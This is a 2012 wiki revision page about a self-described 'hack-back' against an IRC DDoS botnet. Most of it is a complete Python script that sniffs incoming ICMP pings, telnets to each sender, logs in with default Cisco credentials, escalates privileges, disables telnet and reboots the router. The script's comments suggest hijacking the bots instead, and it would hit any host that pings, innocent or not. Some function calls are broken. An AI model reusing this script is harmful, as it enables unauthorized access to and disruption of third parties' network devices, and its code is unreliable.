Questions about this topic? Sign up to ask in the talk tab.
Difference between revisions of "DDoS Attacks/takedowns/Krashed"
From NetSec
(Created page with "====Subject Identification==== * First encounter: 2600net, fail DDoS'd home router. * Aliases: Krashed, [Krashed]. Upon joining my IRC network, Krashed DDoS'd it with his fail C...") |
|||
Line 3: | Line 3: | ||
* Aliases: Krashed, [Krashed]. | * Aliases: Krashed, [Krashed]. | ||
− | Upon joining my IRC network, Krashed DDoS'd it with his fail Cisco botnet. He scans for routers with the default login as "cisco" then uses them in fail DDoS attacks. To combat this, I wrote the script below which detects incoming ICMP packets (yes, he does use ICMP floods), then telnets back to the connection, logs in with "cisco", runs the enable command to elevate privileges, disables telnet and reboots the router to stop the running attack and prevent any future attacks. He could not put me down after this. | + | Upon joining my IRC network, Krashed DDoS'd it with his fail Cisco botnet. He scans for routers with the default login as "cisco" then uses them in fail DDoS attacks. To combat this, I wrote the script below which detects incoming ICMP packets (yes, he does use ICMP floods), then telnets back to the connection, logs in with "cisco", runs the enable command to elevate privileges, disables telnet and reboots the router to stop the running attack and prevent any future attacks. He could not put me down after this. It also has support for tcpdump logs and lists of IP addresses, in case you use it after the fact. |
{{code|text=<source lang="python"> | {{code|text=<source lang="python"> |
Revision as of 18:37, 16 July 2012
Subject Identification
- First encounter: 2600net, fail DDoS'd home router.
- Aliases: Krashed, [Krashed].
Upon joining my IRC network, Krashed DDoS'd it with his fail Cisco botnet. He scans for routers with the default login as "cisco" then uses them in fail DDoS attacks. To combat this, I wrote the script below which detects incoming ICMP packets (yes, he does use ICMP floods), then telnets back to the connection, logs in with "cisco", runs the enable command to elevate privileges, disables telnet and reboots the router to stop the running attack and prevent any future attacks. He could not put me down after this. It also has support for tcpdump logs and lists of IP addresses, in case you use it after the fact.
#!/usr/bin/python # botnet-takedown.py # (C) 2012 rorschach # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 1, or (at your option) # any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA. # # ---------------------------------------------------------------------- # # Cisco botnet takedown script. # Written by rorschach # Use at your own risk, the actions taken by this app may not be legal. # # Run in daemon mode (-d) it will listen for ICMP packets, when it sees one # it will attempt to attack the IP. # # In tcpdump parse mode (-t) it will parse a tcpdump log for offending # IP addresses. # # In IP list mode (-i) it simply takes in a list of IP adresses to attack. # # This script will login to open Cisco routers, turn off telnet and # then reboot it. The functionality could be modified to do things # like take over the bot so only you can use it, turn the attack on # the attacker, etc. The sky is really the limit here. Modify the # takedown() function for this. # # Dependencies: python 2.x and scapy # To install on Ubuntu: # # sudo apt-get install python-scapy # # This script must be ran as root if using daemon mode, due to the fact # that it sniffs packets using scapy. # # Enjoy the script. import sys, telnetlib, re, os, time, socket, threading from threading import Thread from scapy.all import * def usage(argZero): print "Usage: " + argZero print " * -d -- Daemon mode, parse IPs live from incoming ICMP packets." print " * -t <tcpdump log> -- Parse IPs from tcpdump log." print " * -i <ip list> -- Load IPs from list." exit(1) def takedown(ip): # Disable router using telnet. print " [*] Disabling " + ip.rstrip() try: tn = telnetlib.Telnet(ip,23,2) tn.read_until("Password:", timeout=2) # modify these commands to change functionality tn.write("cisco\n") tn.read_until(">", timeout=2) tn.write("enable\n") tn.read_until("Password:", timeout=2) tn.write("cisco\n") tn.read_until("#", timeout=2) tn.write("config\n") tn.read_until("Configuring from terminal, memory, or network [terminal]?", timeout=2) tn.write("\n") tn.read_until("(config)#", timeout=2) tn.write("line vty 0 4\n") tn.read_until("(config-line)#", timeout=2) tn.write("transport input none\n") tn.read_until("(config-line)#", timeout=2) tn.write("^Z\n") tn.read_until("#", timeout=2) tn.write("reload\n") tn.read_until("System configuration has been modified. Save? [yes/no]:", timeout=2) tn.write("yes\n") tn.read_until("Proceed with reload? [confirm]", timeout=2) tn.write("\n") tn.close() except: print " [*] Error: " + ip.rstrip() def takedownParse(pkt,ips): # Parse packets, check to make sure it is an ICMP echo-request, then make sure it has never been seen before, at that point run takedown() if(pkt.summary().split()[2] == "ICMP" and pkt.summary().split()[6] == "echo-request"): ip = pkt.summary().split()[3] check = 0 for eip in ips: if ip.rstrip() == eip.rstrip(): check = 1 break if check == 0: ips.append(ip) f = open("/root/takedown.log", "a+") f.write(ip + "\r\n") f.close() t = threading.Thread(target=takedown,args=(ip,)) t.start() def loadIPs(file): # load IP list from file f = open(file, "r") ips = f.readlines() f.close() for ip in ips: takedown(ip.rstrip()) def parseDumpLogs(host, logFile): # parse tcpdump logs currentTime = time.time() num = 0 print " [*] Initiating takedown" print " [*] Reading tcpdump file" f = open(logFile, "r") # open log, filter out non-icmp packets ips = f.readlines() for n,ip in enumerate(ips): try: if ip.split()[5] == "icmp": ips[n] = ip.split()[2].rstrip() else: ips[n] = "null" except: pass ips = list(set(ips)) # remove duplicates print " [*] Resolving hostnames to IP addresses" for n,ip in enumerate(ips): # if there is a letter in the IP, resolve it to an IP address if(re.search("[a-zA-Z]",ip) != None and ip != socket.gethostname() and ip != "null"): try: tempIP = socket.gethostbyname(ip) if(tempIP != None): ips[n] = tempIP.rstrip() except: pass for n,ip in enumerate(ips): # remove extraneous data if(ip != socket.gethostname() and ip != "null" and ip != ""): if(ip.find(":") != -1): ips[n] = "null" else: num += 1 print " [*] Taking down " + str(num) + " zombies" for ip in ips: # takedown each IP address if(ip != socket.gethostname() and ip != "null" and ip != ""): takedown(ip) print " [*] Takedown complete\r\n\r\nTook down " + str(num) + " IPs in " + str(time.time() / currentTime) + " seconds." def takedownDaemon(): # start sniffing and read IP log f = open("/root/takedown.log", "r") ips = f.readlines() f.close() print "\r\n -- IPs previously taken down -- \r\n" for ip in ips: print " [*] " + ip.rstrip() print "\r\n ------------------------------- \r\n" if os.fork() == 0: if os.fork() == 0: sniff(prn=lambda pkt:takedownParse(pkt,ips), store=0) def main(): print "botnet-takedown.py" if(len(sys.argv) < 2): usage(sys.argv[0]) if(sys.argv[1] == "-d"): # daemon mode takedownDaemon(sys.argv[2]) elif(sys.argv[1] == "-t"): # tcpdump logs if(len(sys.argv) == 3): parseDumpLogs(sys.argv[2]) else: usage(sys.argv[0]) elif(sys.argv[1] == "-i"): # ip log mode if(len(sys.argv) == 3): loadIPs(sys.argv[2]) else: usage(sys.argv[0]) else: usage(sys.argv[0]) if __name__ == "__main__": main() |